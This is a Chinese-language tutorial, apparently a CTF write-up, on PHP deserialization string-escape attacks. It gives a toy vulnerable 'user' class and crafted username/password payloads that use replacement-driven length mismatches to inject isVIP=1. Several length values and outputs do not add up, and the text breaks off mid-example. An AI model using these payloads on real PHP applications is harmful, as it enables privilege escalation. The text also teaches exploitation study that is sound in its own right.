前言:
众所周知php反序列化字符串逃逸,分为2种类型(字符串增多,字符串减少)。但网上大多数文章讲的都是增加一个字符或者减少一个字符串。对于增加减少多个字符串进行逃逸的文章,却少有人提及。本篇文章在特定源码的基础上,对增加减少多个字符串的情况进行简单分析。需要你有一定的字符串逃逸理论基础。如有错误欢迎批评指正。
一、字符串增多
1.1代码如下
假设前提必须使用admin才行
此时$P在}之后,随便写什么都可以,故没有放入文中
<?php
class user{
public $username;
public $password;
public $isVIP;
public function __construct($u, $p){
$this->username = $u;
$this->password = $p;
$this->isVIP = 0;
}
function login(){
$isVip=$this->isVIP;
if($isVip==1){
echo 'flag is niubi';
}else{
echo 'fuck';
}
}
}
//这里替换,分别增加1,2,3个字符
function filter($obj) {
return preg_replace("/admin/","hacker或者hackerr或者hackerrr",$obj);
}
1.2增加1个字符
//单个替换后,增加1了个字符
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"hacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
//";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}共计47个字符,用47个admin替换hacker,使";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}逃逸出去
$u="adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}"
//下面为替换后实际匹配对比
O:4:"user":3:{s:8:"username";s:282:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:282:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:8:"password";s:3:"123";s:5:"isVIP";i:1;}
1.3增加2个字符
//单个替换后增加了2个字符
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"hackerr";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
$u="adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:5:"12345";s:5:"isVIP";i:1;}"
//注意:47/2=23余1,多1位,$u可控所以$u内部s:5:"12345",让其少1位
//下面为替换后实际匹配对比
O:4:"user":3:{s:8:"username";s:161:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:5:"12345";s:5:"isVIP";i:1;}";s:8:"password";s:3:"123";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:161:"hackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerr";s:8:"password";s:5:"12345";s:5:"isVIP";i:1;}";s:8:"password";s:3:"123";s:5:"isVIP";i:1;}
1.4增加3个字符
//单个替换后增加了3个字符
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"hackerrr";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
$u="adminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:4:"1234";s:5:"isVIP";i:1;}"
//注意同理47/3=15余2,多两个,$u可控s:4:"1234"
//下面为替换后实际匹配对比
O:4:"user":3:{s:8:"username";s:120:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:4:"1234";s:5:"isVIP";i:1;}";s:8:"password";s:3:"123";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:120:"hackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerr";s:8:"password";s:4:"1234";s:5:"isVIP";i:1;}";s:8:"password";s:3:"123";s:5:"isVIP";i:1;}
二、字符串减少
假设前提必须使用admin才行
<?php
class user{
public $username;
public $password;
public $isVIP;
public function __construct($u, $p){
$this->username = $u;
$this->password = $p;
$this->isVIP = 0;
}
function login(){
$isVip=$this->isVIP;
if($isVip==1){
echo 'flag is niubi';
}else{
echo 'fuck';
}
}
}
//这里替换,分别减少1,2,3,4个字符
function filter($obj) {
return preg_replace("/admin/","hack或者hac或者ha或者h",$obj);
}
2.1减少1个字符
//单个替换减少1个字符
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"hack";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
//";s:8:"password";s:6:"是不可能动的部分共计22个字符 ";s:8:"password";s:6:"之后的123456可以由$p控制
//由于替换每次每个admin-hack减少1个字符,总计需要22个admin
$u='adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin'
$p=';s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}'
//下面为替换后实际匹配对比
O:4:"user":3:{s:8:"username";s:110:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:46:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:0;}
O:4:"user":3:{s:8:"username";s:110:"hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:8:"password";s:46:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:0;}
2.2减少2个字符
//单个替换减少2个字符
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"hac";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
//同理22/2=11用11个admin
$u='adminadminadminadminadminadminadminadminadminadminadmin'
$p=';s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}'
//下面为替换后实际匹配对比
O:4:"user":3:{s:8:"username";s:55:"adminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:46:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:55:"hachachachachachachachachachachac";s:8:"password";s:46:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:1;}
2.3减少3个字符
先说结论,此题不可以,除非两个可控属性之间有调整的空间,具体看下面
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"ha";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
$u='adminadminadminadminadminadminadmin'
$p=';s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}'
O:4:"user":3:{s:8:"username";s:35:"adminadminadminadminadminadminadmin";s:8:"password";s:45:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:35:"hahahahahahaha";s:8:"password";s:45:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:1;}
2.3减少4个字符
先说结论,此题不可以,除非两个可控属性之间有调整的空间,具体看下面
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;} #
O:4:"user":3:{s:8:"username";s:5:"h";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
$u='adminadminadminadmin'
$p=';s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}'
O:4:"user":3:{s:8:"username";s:25:"adminadminadminadminadmin";s:8:"password";s:46:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:25:"hhhhh";s:8:"password";s:46:";s:8:"password";s:6:"1